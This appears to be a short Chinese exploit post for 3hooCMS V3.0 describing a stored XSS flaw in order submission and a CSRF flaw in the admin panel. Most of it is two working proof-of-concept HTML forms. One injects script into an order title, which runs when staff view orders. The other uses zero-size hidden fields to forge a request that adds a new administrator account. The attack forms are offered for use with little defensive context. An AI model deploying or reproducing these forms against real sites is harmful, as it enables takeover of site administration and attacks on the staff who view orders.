漏洞類型:跨站XSS
漏洞描述:XSS:未對提交內容進行過濾,後臺查看訂單時將執行XSS語句
CSRF:未對URL來源進行驗證,當管理存在cookie時可執行設定的語句
###################### XSS ######################
<style>
.s1{font-size:0px; color:#FFFFFF; border:0px}
</style>
<form method="POST" action="http://localhost/SendOrder.Asp">
<input type=''text'' name=''Title'' size=''32'' value=''在這插XSS語句''>
<input type=''text'' name=''Quantity'' size=''16'' value=''1'' class="s1">
<option value="個"> </option>
<input type="submit" value="提交" name="B1" >
</form>
###################### CSRF #####################(添加管理員)
<style>
.s1{font-size:0px; color:#FFFFFF; border:0px}
</style>
<form method="POST" action="http://localhost/manage/Admin_Send.Asp?rsend=SendAdmin" name="FrmMain">
<input type="text" name="Username" size="20" value="帳號" class="s1">
<input type="text" name="Password" size="20" value="密碼" class="s1">
<input type="submit" name="B1" value="B0mbErM@n" class="s1"> </form>
<script>
3hooCMS V3.0 XSS+CSRF&EXP
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.